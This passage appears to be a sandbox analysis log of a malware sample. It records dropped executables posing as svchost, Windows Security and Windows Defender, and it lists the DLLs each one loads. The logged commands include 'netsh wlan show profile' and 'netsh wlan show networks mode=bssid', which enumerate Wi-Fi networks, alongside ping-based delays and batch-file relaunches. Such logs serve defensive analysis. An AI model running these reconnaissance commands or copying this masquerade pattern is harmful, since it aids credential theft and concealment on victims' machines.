                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: sxs.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: linkinfo.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ntshrui.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: cscapi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeSection loaded: iphlpapi.dll
